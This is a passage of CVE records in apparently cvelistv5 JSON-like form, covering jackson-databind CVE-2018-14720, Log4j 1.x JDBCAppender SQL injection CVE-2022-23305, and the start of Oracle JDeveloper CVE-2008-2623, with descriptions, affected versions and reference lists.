"https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2018-07-27T00:00:00", descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2020-08-31T13:06:09", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", tags: [ "vendor-advisory", "x_refsource_DEBIAN", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", tags: [ "vendor-advisory", "x_refsource_REDHAT", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2018-14720", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { name: "https://github.com/FasterXML/jackson-databind/issues/2097", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", refsource: "CONFIRM", url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { name: "[debian-lts-announce] 20190304 [SECURITY] [DLA 1703-1] jackson-databind security update", refsource: "MLIST", url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { name: "[lucene-dev] 20190325 [jira] [Assigned] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286@%3Cdev.lucene.apache.org%3E", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f@%3Cdev.lucene.apache.org%3E", }, { name: "[pulsar-commits] 20190416 [GitHub] [pulsar] one70six opened a new issue #4057: Security Vulnerabilities - Black Duck Scan - Pulsar v.2.3.1", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "[lucene-dev] 20190325 [jira] [Updated] (SOLR-13112) CVE-2018-14718(-14719),sonatype-2017-0312, CVE-2018-14720(-14721) Threat Level 8 Against Solr v7.6. com.fasterxml.jackson.core : jackson-databind : 2.9.6. FasterXML jackson-databind 2.x before 2.9.7 Remote Hackers...", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df@%3Cdev.lucene.apache.org%3E", }, { name: "RHSA-2019:0782", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { name: "RHBA-2019:0959", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { name: "RHSA-2019:1107", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { name: "RHSA-2019:1108", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { name: "RHSA-2019:1106", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { name: "RHSA-2019:1140", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { name: "DSA-4452", refsource: "DEBIAN", url: "https://www.debian.org/security/2019/dsa-4452", }, { name: "20190527 [SECURITY] [DSA 4452-1] jackson-databind security update", refsource: "BUGTRAQ", url: "https://seclists.org/bugtraq/2019/May/68", }, { name: "https://security.netapp.com/advisory/ntap-20190530-0003/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "RHSA-2019:1822", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { name: "RHSA-2019:1823", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { name: "RHSA-2019:2858", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "[drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E", }, { name: "RHSA-2019:3149", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { name: "[drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E", }, { name: "[drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E", }, { name: "RHSA-2019:3892", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { name: "RHSA-2019:4037", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2018-14720", datePublished: "2019-01-02T18:00:00", dateReserved: "2018-07-28T00:00:00", dateUpdated: "2024-08-05T09:38:13.593Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2022-23305
Vulnerability from cvelistv5
Published
2022-01-18 15:25
Modified
2024-08-03 03:36
Severity ?
EPSS score ?
Summary
By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
References
| ▼ | URL | Tags |
|---|---|---|
| https://logging.apache.org/log4j/1.2/index.html | x_refsource_MISC | |
| https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y | x_refsource_MISC | |
| http://www.openwall.com/lists/oss-security/2022/01/18/4 | mailing-list, x_refsource_MLIST | |
| https://www.oracle.com/security-alerts/cpuapr2022.html | x_refsource_MISC | |
| https://security.netapp.com/advisory/ntap-20220217-0007/ | x_refsource_CONFIRM | |
| https://www.oracle.com/security-alerts/cpujul2022.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Log4j 1.x |
Version: 1.2.1 < unspecified Version: unspecified < 2.0-alpha1 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T03:36:20.421Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", }, { name: "[oss-security] 20220118 CVE-2022-23305: SQL injection in JDBC Appender in Apache Log4j V1", tags: [ "mailing-list", "x_refsource_MLIST", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/4", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20220217-0007/", }, { tags: [ "x_refsource_MISC", "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j 1.x ", vendor: "Apache Software Foundation", versions: [ { lessThan: "unspecified", status: "affected", version: "1.2.1", versionType: "custom", }, { lessThan: "2.0-alpha1", status: "affected", version: "unspecified", versionType: "custom", }, ], }, ], credits: [ { lang: "en", value: "Daniel Martin of NCC Group", }, ], descriptions: [ { lang: "en", value: "By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, ], metrics: [ { other: { content: { other: "high", }, type: "unknown", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-89", description: "CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-07-25T16:49:18", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://logging.apache.org/log4j/1.2/index.html", }, { tags: [ "x_refsource_MISC", ], url: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", }, { name: "[oss-security] 20220118 CVE-2022-23305: SQL injection in JDBC Appender in Apache Log4j V1", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/4", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20220217-0007/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], source: { discovery: "UNKNOWN", }, title: "SQL injection in JDBC Appender in Apache Log4j V1", workarounds: [ { lang: "en", value: "Users should upgrade to Log4j 2 or remove usage of the JDBCAppender from their configurations.", }, ], x_generator: { engine: "Vulnogram 0.0.9", }, x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2022-23305", STATE: "PUBLIC", TITLE: "SQL injection in JDBC Appender in Apache Log4j V1", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache Log4j 1.x ", version: { version_data: [ { version_affected: ">=", version_value: "1.2.1", }, { version_affected: "<", version_value: "2.0-alpha1", }, ], }, }, ], }, vendor_name: "Apache Software Foundation", }, ], }, }, credit: [ { lang: "eng", value: "Daniel Martin of NCC Group", }, ], data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, ], }, generator: { engine: "Vulnogram 0.0.9", }, impact: [ { other: "high", }, ], problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", }, ], }, ], }, references: { reference_data: [ { name: "https://logging.apache.org/log4j/1.2/index.html", refsource: "MISC", url: "https://logging.apache.org/log4j/1.2/index.html", }, { name: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", refsource: "MISC", url: "https://lists.apache.org/thread/pt6lh3pbsvxqlwlp4c5l798dv2hkc85y", }, { name: "[oss-security] 20220118 CVE-2022-23305: SQL injection in JDBC Appender in Apache Log4j V1", refsource: "MLIST", url: "http://www.openwall.com/lists/oss-security/2022/01/18/4", }, { name: "https://www.oracle.com/security-alerts/cpuapr2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { name: "https://security.netapp.com/advisory/ntap-20220217-0007/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20220217-0007/", }, { name: "https://www.oracle.com/security-alerts/cpujul2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], }, source: { discovery: "UNKNOWN", }, work_around: [ { lang: "en", value: "Users should upgrade to Log4j 2 or remove usage of the JDBCAppender from their configurations.", }, ], }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2022-23305", datePublished: "2022-01-18T15:25:22", dateReserved: "2022-01-17T00:00:00", dateUpdated: "2024-08-03T03:36:20.421Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2008-2623
Vulnerability from cvelistv5
Published
2009-01-14 02:00
Modified
2024-08-07 09:05
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.3 allows local users to affect confidentiality via unknown vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://secunia.com/advisories/33525 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.vupen.com/english/advisories/2009/0115 | vdb-entry, x_refsource_VUPEN | |
| http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html | x_refsource_CONFIRM | |
| http://www.securitytracker.com/id?1021572 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/bid/33177 | vdb-entry, x_refsource_BID |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-07T09:05:30.403Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "33525", tags: [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred", ], url: "http://secunia.com/advisories/33525", }, { name: "ADV-2009-0115", tags: [ "vdb-entry", "x_refsource_VUPEN", "x_transferred", ], url: "http://www.vupen.com/english/advisories/2009/0115", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", }, { name: "1021572", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id?1021572", }, { name: "33177", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/33177", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2009-01-13T00:00:00", descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.3 allows local users to affect confidentiality via unknown vectors.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2009-01-24T10:00:00", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { name: "33525", tags: [ "third-party-advisory", "x_refsource_SECUNIA", ], url: "http://secunia.com/advisories/33525", }, { name: "ADV-2009-0115", tags: [ "vdb-entry", "x_refsource_VUPEN", ], url: "http://www.vupen.com/english/advisories/2009/0115", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", }, { name: "1021572", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id?1021572", }, { name: "33177", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/33177", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2008-2623", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: 